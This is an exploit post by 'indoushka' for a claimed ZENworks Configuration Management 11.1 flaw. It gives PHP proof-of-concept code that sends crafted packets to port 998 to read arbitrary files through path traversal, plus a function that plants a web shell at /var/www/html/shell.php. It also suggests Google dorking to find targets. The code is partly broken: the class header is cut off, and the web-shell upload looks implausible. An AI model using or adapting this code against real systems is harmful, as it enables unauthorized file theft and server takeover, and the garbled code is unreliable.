============================================================================================================================================= | # Title : ZENworks Configuration Management 11.1 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.opentext.com/products/zenworks-suite | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: A custom packet is sent to port 998 to get a specific file from the file system. I have added comments in the code to explain the main operations. Support for all operating systems and the ability to upload a web shell to the code. Now you can use the uploadWebShell function to upload a web shell to the desired path [+] save code as poc.php. [+] Set Target : line 84 [+] USage : php poc.php [+] PayLoad : ip = $ip; $this->port = $port; $this->filePath = $filePath; $this->depth = $depth; } public function exploit() { if (empty($this->filePath)) { echo "Please supply the name of the file you want to download\n"; return; } $travs = str_repeat("\\..", $this->depth); if ($this->filePath[0] !== "\\") { $travs .= "\\"; } $travs .= $this->filePath; $payload = mb_convert_encoding($travs, 'UTF-16LE'); $packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload; $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5); if (!$sock) { echo "Connection failed: $errstr ($errno)\n"; return; } fwrite($sock, $packet); fread($sock, 4); // Ignore first 4 bytes $lengthData = fread($sock, 4); if (!$lengthData) { echo "Unable to get length due to a timeout\n"; fclose($sock); return; } fread($sock, 0x210 - 8); // Skip unnecessary data $length = unpack("V", $lengthData)[1]; $contents = fread($sock, $length); if (!$contents) { echo "Unable to extract contents due to a timeout\n"; fclose($sock); return; } fclose($sock); echo "File retrieved successfully!\n"; $fname = basename($this->filePath); file_put_contents($fname, $contents); echo "File saved in: $fname\n"; } public function uploadWebShell($shellContent, $destination = '/var/www/html/shell.php') { $sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5); if (!$sock) { echo "Connection failed: $errstr ($errno)\n"; return; } $payload = mb_convert_encoding($destination, 'UTF-16LE'); $packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload; $packet .= mb_convert_encoding($shellContent, 'UTF-16LE'); fwrite($sock, $packet); fclose($sock); echo "Web shell uploaded successfully at: $destination\n"; } } // مثال على الاستخدام $exploit = new NovellZenworksExploit('192.168.1.1'); $exploit->exploit(); // رفع ويب شل $shell = ""; $exploit->uploadWebShell($shell, '/var/www/html/shell.php'); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx